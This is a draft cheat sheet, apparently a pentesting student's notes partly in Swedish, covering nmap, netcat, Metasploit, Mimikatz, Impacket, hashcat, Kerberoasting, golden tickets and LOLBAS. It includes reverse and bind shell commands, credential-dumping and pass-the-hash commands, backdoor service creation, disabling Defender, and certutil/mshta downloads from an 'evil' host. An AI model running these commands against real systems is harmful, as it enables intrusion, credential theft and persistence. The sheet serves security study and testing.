Show Menu
Cheatography
  1. Home >
  2. Cheat Sheets >

Test Cheat Sheet (DRAFT) by

TestTestTestTestTestTest

This is a draft cheat sheet. It is a work in progress and is not finished yet.

nmap

-sn <ip>
Ping sweep
-sT <ip>
TCP-full connect scan
-sS <ip>
TCP SYN half-open (requires root)
-sU <ip>
UDP scan
-sV <ip>
Version scan
-O <ip>
OS-fin­ger­print
-Pn <ip>
Treat all host as online (skip host discovery)
-sX <ip>
Xmas scan
--top-­por­ts=10 <ip>
Scan top 10 most common ports
<ip> -sV -Pn --reason
Add --reason to get why port is open
-6 -sV <ip>
IPv6 scan
-sA <ip>
Avoid IDS/IPS firewalls (only sends ACK-flag)
-iL list-o­f-i­ps.txt
Scan from list of IPs
Save output to file
-oN
Normal output
-oX
XML format
-oG
Greppable format
-oS
Script kiddie output
-oA
Output in the three useful formats (all but script kiddie)
-p 0–65535 eller --all-ports
Skanna alla portar (-p- har inte med port 0)
Scripts
auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, saft, version, vuln
-sC/--­script
Script scan
nmap --scri­pt=vuln <ip> -Pn -n –v
Use --scri­pt=vuln to find vulner­abi­lities for host
nmap --scri­pt-­hel­p=h­ttp­-brute
Find info about script http-brute
Timing template
900000ms, 900, 900s, and 15m
Time defini­tions. All means the same amount of time
-T0
paranoid
-T1
sneaky
-T2
polite
-T3
normal (default)
-T4
agressive
-T5
insane
Delays
--host­-ti­meout <ti­me>
Give up on slow target hosts. value 0 can be used to mean “no timeout”
--scan­-delay <ti­me>
Wait <ti­me> between each probe
--scri­pt-­timeout <ti­me>
Sets a ceiling on script execution time.

tcpdump

-D
List alla interfaces
-i
Record from specific interface
-nn
Do not resolve hostnames
-w output.pcap
write to file
-v
Verbose
EXAMPLE
tcpdump -i eth1
Record traffic from eth1
tcpdump -i eth1 -w ~/outp­ut.pcap
Write to file
tcpdump -i eth1 -r ~/outp­ut.pcap
Read from file
FILTER
tcpdump -i eth0 host 127.0.0.1
Filter on host 127.0.0.1 using host
tcpdump -i eth0 dest net 172.16.14­6.0/24
Filter on network using net (and dest)
tcpdump -i eth0 portrange 0-1024
Filter on portrange
tcpdump -i eth0 port 80
Filter on port
tcpdump -i eth0 tcp src port 80
Filter on src (and port)
PROTOCOL
ether, ip, ip6 , arp, rarp, tcp, udp
tcpdump -r sus.pcap icmp or host 172.16.146.1
Filter on protocol icmp and host
tcpdump -r sus.pcap not icmp
Filter NOT on protocol icmp
Use 
and / or
to combine these together

netcat (nc)

Flags
-l
Listen mode
-L
Listen harder - Make a persistant listener
-n
Don't resolve names
-z
Zero I/O. Don't send any data
-v
verbose
-p
Local port
-u
UDP connection
-e
Program to execute after connec­tions occurs (unsafe, needs to be enabled in some cases. Depends on nc-ver­sion)
-w 10
Timout after 10 seconds
Examples
nc -l -p 1337 -e /bin/bash
Open listener
nc -zvn <ip> <po­rt>
Use as port scanner
nc <ip> <po­rt>
Connect to port, eg webserver
File receiv­er/­sender
nc -l port > filename
On host: Start file receiver
nc host port < filename
On client: Send file
Reverse Shell (attacker is listener)
On target machine
 
nc <ip> <po­rt> -e /bin/bash
On attacking machine
 
nc -lvnp <po­rt>
Bind Shell (victim is listener)
On target machine
 
nc -lvnp <po­rt> -e /bin/bash
On attacking machine
 
nc -nv <ip> <po­rt>

Metasploit

MODULES
Auxiliary
Verkty­gsm­oduler för scanning, fuzzing, brutef­orce, sniffning
Encoders
Kodar payloads för att undvika antivirus
Exploits
Utnyttjar en sårbarhet i mål (t.ex. buffer overflow, RCE)
NOPs
(No Operation code) används för padding i exploits
Payloads
Kod som körs efter en exploit (t.ex. reverse shell)
Plugins
Additional scripts can be integrated within an assessment with m­sfc­ons­ole and coexist.
Post
Används efter access, för enum, dump, persis­tence
Evasion
Designade för att undvika AV/EDR, t.ex. via obfusk­ering
Exploi­t/m­ult­i/h­andler
Ta emot en payload (lyssnare)
<mo­dul­typ­>/<­pla­ttf­orm­>/<­kat­ego­ri>­/<n­amn>
Exploi­t/modul format (exploit, auxiliary, post )
<pa­ylo­adt­yp>­/<p­lat­tfo­rm>­/<f­unk­tio­n>
Payload format (windows, linux, cmd)
API
load extapi
Extended API (måste laddas manuellt)
stdapi
Standa­rd-API (laddas automa­tiskt)
MISC
smart_­has­hdump
Väljer smart/­aut­oma­tiskt vilka hashar att dumpa (lokalt eller domän)
search name:mysql
Search exploits (mysql)
search cve:2011 author­:jduck platfo­rm:­linux
Search exploit
PAYLOA­DTYPER
revers­e_tcp
Offret ansluter tillbaka till attack­eraren via TCP
bind_tcp
Offret har lyssnare på en port, som attack­erare utnyttjar och ansluter in på
METERP­RETER
migrate <ps­Id>
Migrera till en stabilare process tex winlog­on.exe (behöver köra ps)
load kiwi
Mimikatz från meterp­reter
creds_all
Dumpa alla creds (kiwi)
creds_­ker­beros
se TGT/TGS (kiwi)
route add 10.1.10.5 1
Routa trafik via en host och session (1)
MSFVENOM
skapa payloads och exploits i olika format – t.ex. .exe, .ps1, .apk, .asp, .dll
msfvenom -p window­s/m­ete­rpr­ete­r/r­eve­rse_tcp LHOST=­10.1­0.1­4.25 LPORT=4444 -f exe -o payloa­d.exe
-p
Payloadtyp
-f
Format

LINUX

 

Crontab

crontab -l
List jobs
crontab -e
Edit jobs
 
*  *  *  *  *  /home/­use­r/s­cri­pt.sh
Min Hour Day(Mo­nth­,1-31) Month Day(Week, 0-6)

MISC

/etc/n­ssw­itc­h.conf
Styr i vilken ordning Linux-­sys­temet slår upp inform­ation om användare, grupper, och namn – t.ex. via filer, DNS eller LDAP.
getent shadow
Lista shawdow (kräver root)
getent passwd
Lista passwd

PASSWORD

 

/etc/s­hadow

sai:$6$YTJ7JK­nfs­B4e­snbS$5XvmYk­2.G­XVW­hDo­2TY­GN2­hCi­tD/­wU9­Kov.uZ­D8x­snl­euf­1r0­ARX­3qo­dIK­iDs­doQ­A44­4b8­IMP­MOn­UWD­mVJ­Vke­g1:­194­46:­0:9­999­9:7:::
YTJ7JK­nfs­B4esnbS
salt
Password hashes
$1$
MD5
$2$
Blowfish
$2y$
Blowfish
$5$
SHA-256
$6$
SHA-512
$y$
yescrypt

Hashcat

hashcat -a 0 -m 16500 <jw­t> <wo­rdl­ist>
Crack JWT
hashcat -m 1800 -a 0 -o found1.txt crack1.hash 500_pa ‐ ssw ord s.txt
Crack Linux SHA512 password with dict
hashcat --force -m 13100 -a 0 lab3.h ashcat /path/ to/ Dic ‐ t.txt --show
Crack Kerberos Service Ticket for account password
-a
Attack mode (0=dic­tio­nary, 3=BF)
-m
Hash-type
Hash types
-m 0
MD5
-m 100
SHA1
-m 1000
NTLM
-m 1800
SHA512­crypt
-m 3000
LM
-m 5600
NetNTLMv2
-m 13100
Kerberos
-m 16500
JWT

Mimikatz

Kräver local admin och tillgång till SYSTEM för att få ut något intressant
privil­ege­::debug
Ge Mimikatz rättig­heter att läsa LSASS-­pro­ces­sminnet
token:­:el­evate
Bli SYSTEM (krävs för att läsa LSASS)
sekurl­sa:­:lo­gon­pas­swords
Dumpa hashar från minnet
token:­:whoami
Lista vem som kör mimikatz (för att bekräfta sin roll efter elevering)
lsadum­p::sam
Dumpa SAM
lsadum­p::­dcsync
AD-hashar
load mimikatz
Kör via metasploit

Impacket

SECRET­SDUMP
Dump password hashes
impack­et-­sec­ret­sdump
Dump NTLM hash (or use Mimikatz)
impack­et-­sec­retdump -sam sam -system system -security security LOCAL
Retrive password
secret­sdu­mp.py -system SYSTEM -ntds ntds.dit LOCAL
Dump NTDS
SMBCLIENT
Explore downlo­ad/­upload files using SMB
pth-sm­bcl­ient.py -hashes aad3b4... EXAMPL­E/a­dmi­nis­tra­tor­@10.10.10.5
Use NTML-hash at machine
PSEXEC
Execute commands by createing a service (noisy)
impack­et-­pse­xec.py -hashes :aad3b­435­b51­404­eea­ad3­b43­5b5­1404ee EXAMPL­E/A­dmi­nis­tra­tor­@19­2.1­68.1.10
Use NTLM hash (pass-­the­-hash) -> Remote shell
WMIEXEC
Commands using WMI. (more scilent than psexec)
wmiexec.py DOMAIN­/us­er@­10.0.0.5 -hashes :NTLMHASH
(PTH) Execute commands on remote­-co­mputer

John the Ripper (JtR)

Commands
john hash.txt
Run john against hash.txt
john --form­at=­krb5tgs --word­lis­t=r­ock­you.txt tgt_ha­sh.txt
Kerber­oasting
john --form­at=lm hash.txt
Crack LM-hash
john --form­at=nt hash.txt
Crack NT-hash
john --form­at=­netntlm hash.txt
Crack NTLMv1­/Ne­t-N­TLMv1 (chall­eng­e/r­esp­onse)
john --form­at=­net­ntlmv2 hash.txt
Crack NTLMv2­/Ne­t-N­TLMv2 (chall­eng­e/r­esp­onse)
Output­/Misc
john.pot
File with cracked password
john.rec
store john's current status
john --restore
Picks up where it left of. Based on john.rec
jumbo-­package
Support for additional hash types. Separate package install. Use --rule­s=jumbo
 

WINDOWS

 

Windows

REGISTRY
SAM
NTLM Password passwords - Stores creden­tials and account inform­ation for local users. userna­me:­RID­:LM:NT.
Secrets
Stores recent cached login passwords of users. Stores secrets used by the Local Security Authority (LSA)
System
Stores system config­uration data
Security
Stores user security policy data
PATHS
HKEY_L­OCA­L_M­ACH­INE\SAM
C:\Win­dow­s\S­yst­em3­2\c­onf­ig\SAM
HKEY_L­OCA­L_M­ACH­INE­\Se­cur­ity­\Po­lic­y\S­ecrets
HKEY_L­OCA­L_M­ACH­INE­\SYSTEM
C:\Win­dow­s\S­yst­em3­2\c­onf­ig­\SYSTEM
HKEY_L­OCA­L_M­ACH­INE­\Se­curity
C:\Win­dow­s\S­yst­em3­2\c­onf­ig­\SEC­URITY
LANMAN
Old! Converted to uppercase. No salt. Divided into 7 chars-­block. Maximum 14 chars. DES.
AAD3B4­35B­51404EE
Hårdkodad LANMAN padding
MISC
Admini­str­ato­r:5­00:­aad­3b4­35b­514­04e­eaa­d3b­435­b51­404­ee:­cd0­6ca­7c7­e10­c99­b1d­33b­748­5a2­ed8­08:::
Exempel på rad i SAM
NT AUTHOR­ITY­\SYSTEM (S-1-5-18)
Gud på en helt lokal dator. Finns inte i AD. Ingen relation till andra SYSTEM på andra datorer
NT-Hash algoritm
MD4

Kerber­ost­ermer

Domain Controller (DC)
Controlls the AD
Key Distri­bution Center (KDC)
Serivce in DC. User authen­ticates with user/pass. Distribute TGT.
Authen­tic­ation Service (AS)
Part of KDC. Authen­tic­ates. kerberos client - grants a TGT
Ticket Granting Service (TGS)
Part of KDC. Validates the TGT. Issues a ST to specific resour­ce/­service
Ticket Granting Ticket (TGT)
Proof of authen­tic­ation. Given by KDC. Is then used to ask for ST (at TGS)
Service Tickets (ST)
Gives access to asked resour­ce/­service
FLÖDE
1. Användaren ber om en TGT
2. Användaren loggar in och autent­iseras av KDC.
3. KDC utfärdar en TGT till använd­aren.
4. Användaren använder TGT:n för att begära servic­ebi­ljetter från TGS för de tjänster de behöver åtkomst till.
5. TGS verifierar TGT:n och utfärdar servic­ebi­lje­tten.
6. Användaren använder servic­ebi­ljetten för att autent­isera mot tjänsten.
Misc
NTDS.dit
Located at Domain Contro­ller. Stores NTML, kerber­os-keys etc.
DOMAIN­\Ad­min­ist­rat­or:­500­:aa­d3...:­cd0­6...:::
Rad i NTDS.dit
Service Principal Name (SPN)
Finns för vajre tjänst. KDC vet att vilken varje SPN är kopplat till, för specifikt konto
MSSQLS­vc­\sql­ser­ver.ex­amp­e.c­om:443
Exempel på SPN
Servic­ekonto
AD-konto som kör respektive tjänst. Manuellt underhåll.
Managed Service Account (MSA)
AD-konto för säker och automa­tiserad tjänst­ekö­rning. Automatisk lönsen­ord­sha­nte­ring.

Kerber­oasting

(1) Discover SPNs
eg. with Impacket (GetUs­erS­PN.py), PowerV­iew­(Ge­t-D­oma­inUser)
(2) Request service tickets
eg. with Impacket
(3) Export service tickets
eg. with Impacket --> $krb5t­gs$­23$­*....
(4) Crack service tickets.
eg. with Hashcat
setspn
setspn -T lab.local -Q */*
List all SPNs in domain

Windows tools

SYSINT­ERNALS
Övervaka processer, starta tjänster, dumpa minne
wmic ( Windows Management Instru­men­tation Comman­d-line)
Samla systeminfo eller kör kod tyst – lokalt eller fjärr
wmic /node:­"­192.16­8.1.10­" process call create "­cmd.exe /c whoami­"
Starta kommando på fjärrm­askin
wmic /node:­tar­get­A.h­ack­er.lab /user:­hac­ker.la­b\admin /passw­ord­:pa­ssw0rd get product name,v­end­or,­version /forma­t:csv
Lista alla instal­lerad mjukvara med namn och version
wmic service get name,d­isp­lay­nam­e,p­ath­nam­e,s­tar­tmode | findstr /i "­Aut­o" | findstr /i /v "­C:­\Win­dow­s\­\" | findstr /i " "
Hitta tjänster med osäkra sökvägar
SC (Service Control)
Skapa eller styra Window­s-t­jänster för exekvering eller persistens
sc create backdoor binPath= "­cmd.exe /k" start= auto
Skapa bakdör­rss­ervice
sc create newservice binpath= "­cmd.exe /k c:\Win­dow­s\T­emp­\nc.exe -L -p 8080 -e cmd.ex­e"
Skapa lyssnare via nc genom persistent (/k) cmd
TASKLIST
Visa alla aktiva processer
tasklist /v | findstr "­svc­hos­t"
Hitta intres­santa processer
tasklist /fo csv /fi "­use­rname ne servic­eac­ct"
Hitta processer som inte körs av servic­eacct. Spara till CSV
net
Hantera användare, grupper och resurser
net user bob passw0­­rd1234 /add
Add user
net share
Lista alla delade mappar
net use
Lista aktiva nätver­ksa­nsl­utn­ingar
net accounts
Kontop­lolicy (lösenor, lockout etc)
net localgroup admini­str­ators*
Lista alla admini­störer (som finns i gruppen)
SCHTASKS
Skapa schema­lagda tasks
schtasks /query /tn myshell
List task myshell
schtasks /Create /tn myshell /tr C:\use­rs­\non­\sh­ell.exe \sc MINUTE
Create task myshell, path to program (/tr), every minute (/sc)
PSEXEC
Sysint­ernals som låter dig köra kommandon på en fjärrd­ator. Kör ofta som SYSTEM
psexec \\192.1­68.1.100 cmd.exe
Starta kommando (skal) på fjärrdator
psexec \\target -u DOMAIN­\admin -p Passwo­rd123 cmd.exe
Med user/pass
psexec \\target cmd.exe /c "­whoami > C:\out­put.tx­t"
Kör kommando utan att öppna skal
psexec \\target -c revshe­ll.exe
Ladda upp och kör payload
ICACLS
Visar och ändrar behöri­gheter på filer och mappar i Windows.
icacls C:\ | findstr BUILTI­N\Users
Hitta skrivbara mappar
ACCESSCHK
Visar vem som har vilka rättig­heter till filer, mappar, tjänster, regist­ern­ycklar m.m.
access­chk.exe -d "­C:­\Program Files­\MyA­pp"
Lista vilka användare som kan skriva till en mapp
access­chk.exe -c *
Listar tjänster och vem som kan starta­/ändra dessa
WINRM
Fjärrs­tyr­nin­gsp­rot­okoll som tillåter att kommandon körs på andra Window­s-m­askiner via nätverket, ofta med PowerShell
$s = New-PS­Session -Compu­terName <na­me> -Crede­ntial <la­b\n­eta­dmi­n>
Skapa session i$s
Invoke­-Comand -Scrip­tBlock {Get-N­et-­IPA­ddress} -Session $s
Kör NetIPA­ddress på remote via session $s
Enable­-PS­Rem­oting
Starta WinRM

PASS-T­HE-HASH

Autent­isera till en tjänst direkt med NTLM-hash, utan att känna till löseno­rdet.
sekurl­sa::pth /user:­Adm­ini­strator /domai­n:LAB /ntlm:­cd0­6ca­7c7­e10­c99­b1d­33b­748­5a2­ed808 /run:c­md.exe
PTH
Metasploit expects the fortmat LMHASH­:NT­HASH.
Eg. when using SMBPass

OVERPA­SS-­THE­-HASH

Använd NTLM-h­ashen för att skapa en Kerberos TGT → sedan autent­isera via Kerberos.
kerber­os:­:purge
OPtH
sekurl­sa::pth /user:­admin /domai­n:t­est.local /ntlm:­cd0­6ca­7c7­e10­c99­b1d­33b­748­5a2­ed808 /run:c­md.exe

Golden Ticket

En förfalskad Kerberos TGT som skapas med krbtgt-hashen och ger fullst­ändig, obehindrad access i en domän — utan att fråga domänk­ont­rol­lanten. TGT:n kan vara valid i 10 år. Kräver admin.
lsadum­p::­dcsync /user:­krbtgt
Hämta krbtgt-kontots NTML-hash via Mimikatz (kärver domäna­dmin)
kerber­os:­:golden
Skapa golden­-ticket med Mimikatz
krbtgt
Domain account signing all requests for TGTs
DCSync
Attack där man imiterar en DC och ber AD om löseno­rds­hashar via replik­ering.
To create a Golden Ticket with Mimikatz: valid user ID, domain SID, domain name, krbtgt hash, any username

kerber­os:­:golden /user:­Sup­erH­acker /ID:500, /sid: S-1-5-­21-­132­673­183­5-1­460­568­60-­287­7405472 /krbtg­t:<NTLM hash of krbtgt accoun­t> /domai­n:H­ACK­EDL­AB.l­ocal

CMD

/c
Run and close window
/k
Run and keep window open
/q
Quiet mode
/d
Disable autorun
/s
Quote friendly mode
cmd.exe /k color 0a
Start window with green color, and keep it open
type
Som cat, fast i cmd
Forward lookup

Powershell

Execution Policy
powers­hel­l.exe -Execu­tio­nPolicy Bypass -File script.ps1
Temorär bypass av Execution Policy
Get-Ex­ecu­tio­nPolicy
Hämta policyn
Restricted
Inga script får köras
RemoteSign
Lokala skript OK. Fjärr måste vara signerade
Bypass
Kör allt utan att fråga
Unrest­ricted
Kör allt. Kommer få vaning om skript är från internet.
MISC
Get-Ch­ildItem -Recurse -Path C:\ -Filter "passxlsx"
Hitta fil som innehåller pass och filtype xlsx
Set-Mp­Pre­ference -Disab­leR­eal­tim­eMo­nit­oring $true
Disable Windows Defender (real-time monito­ring)
Add-Mp­Pre­ference -Exclu­sio­nPath "­Y:­\IT­\Sec­uri­ty"
To ensure that specified folder is not scanned by Windows Defender

Responder

Waiting for "­inc­orr­ect­" authen­tic­ations, to get NTLM-hash. Pretends to be the correct service. Requires root. Catches Challe­nge­-re­spo­nse­-ha­shses from NTLM-auth.
Challe­nge­-re­sponse, inte en pwd-hash. NTLM != NetNTL­Mv1/v2
responder -I eth0
Start
NetNTLMv1
Äldre, svagare challenge response --> 5500 - hashcat
NetNTLMv2
Nyare, starkare - vanligt i moderna Windows --> 5600 hashcat
userna­me:­:DO­MAI­N:c­hal­len­ge:­res­pon­se:blob
USERNA­ME:­:DO­MAI­N:1­122­334­455­667­788­:01­234­567­89A­BCD­EF0­123­456­789­ABC­DEF­:01­020­304­050­607­080­90A­0B0­C0D­0E0F10
Hasharna används främs för att knäckas, inte som tex PtH

Bloodh­oun­d/S­har­phound

Kartlägger behöri­ghe­tsvägar i Active Directory. Hjälper till att hitta privilege escala­tio­n-p­aths. Sharph­oun­d(CLI) samlar in AD-data. Läser in i Bloodh­oun­d(GUI)
Invoke­-Bl­ood­Hound -Colle­cti­onM­ethod All
Powers­hel­lve­rsionen av Sharph­ound. Körs i minnet. Resultat: Zip som läses in i BH
SharpH­oun­d.exe -c All
Binär. Används om PS är blockat. Resultat: Zip som läses in i BH
Invoke­-Bl­ood­Hound -Domain LAB.local -Username hacker -Password hemligt123
Specif­icera domän

Cain

Sniffar, fångar och knäcker lösenord och hashar i ett lokalt nätverk. Kräver admini­str­atör. GUI-ve­rktyg. Främst Windows fokus

Azure & Entra ID

Struktur
Tenants
Isolerad instans av EntraID
Users
Interna och externa
Roles
RBAC för att styra vad användaren kan göra
Roller
Global Admini­strator
Full kontroll över allt
Privileged Role Admini­strator
Hanterar roller. Kan ge sig själv Global Admin
Applic­ation Developer
Registrera appar och ge dom API-access
Security Reader
Kan läsa säk.konf, men ej ändra
Misc
Service Principal
Kopplar app till EntraID dvs gör appen körbar
App Regist­ration
App som skapats av tenant. Innehåller konfig, behöri­gheter och secrets
Enterprise Applic­ation
Faktiska instansen (Service Principal) av en app i en tenant
Condit­ional Access
Styra när, var och hur användare får åtkomst till resurser – baserat på olika villkor --> MFA
Attack
Shadow admin
App kan få admin-­rät­tig­heter i smyg, via API-be­hör­igheter

PowerS­plo­it/­Pow­erV­iew­/Empire

PowerS­ploit
Samling offensiva Powers­hel­l-s­cript. Används ofta från RAM. Innehåller PowerView, PowerUp etc
PowerS­plo­it.psd1
PowerView
Recon-­delen i PowerS­ploit (AD-en­ume­rer­ing). Läses in direkt i minnet (iex)
Import­-Module PowerV­iew.ps1`
Starta modul
Invoke­-Ke­rbe­roast
Dra ut TGS för crack
Get-Do­mai­nUser -SPN
Inform­ation om DC
Empire
Post-e­xpl­oit­-ra­mverk (C2) med färdiga moduler ex. PowerView. Liknar Metasploit i syntaxen
CLI-ko­mmandon (liste­ners, usestager, agents

AD

Group Policy Objects (GPOs) används för att centralt styra konfig­ura­tioner på användare och datorer i en Active Direct­ory­-domän. EJ EntraID
Group Policy­–ma­naged passwords
Finns i Groups.xml på SYSVOL. Kräver endast giltigt domain user account för att läsa filen. AES-kr­ypt­ering.
Group Policy Store
SYSVOL
Filbas­erad. Skript, instäl­lni­ngs­filer, templates
AD
Katalo­gba­serad. Metadata: namn, länkar, versio­nsn­ummer
ATTACKER
Golden SAML
Certif­ika­tsk­apning möjliggör falsk autent­isering
Token replays
Missbruk av tokens (OpenID & v OAuth 2.0)
AAD Connect
Synkar konton från AD till Entra ID. Om servern kompro­met­teras -> Dumpa NT-hashar

LOLBAS

Ladda ned payloads, köra kod dolt, persis­tence
certutil -urlcache -f http:/­/ev­il/­pay­loa­d.exe payloa­d.exe
Handling certif­icates
mshta http:/­/ev­il/­mal­ici­ous.hta
Execute html applic­ations

MISC

 

Misc

Lista portar
netstat -antp | grep LISTEN
Lists open ports/­con­nec­tions
Get-Ne­tTC­PCo­nne­ction -State Listen
Lists open ports/­con­nec­tions (power­shell)
Lista grupper
net localgroup "­Adm­ini­sta­tro­r"
Lista admini­strator
Get-Lo­cal­Gro­upM­ember -Name "­Adm­ini­str­ato­r"
Lista admini­strator
Lista firewall states
Get-Ne­tFi­rew­all­Profile | Select Name,E­nabled
Lista firewall states
netsh advfir­ewall show allpro­files
Lista firewall states

Common ports

21
FTP
22
SSH & SFTP
23
Telnet
69
TFTP
88
(TCP och UDP): Kerberos Key Distri­bution Center (KDC)
445
SMB
2049
NFS
3389
RDP
5985/5986
WinRM (http/­https)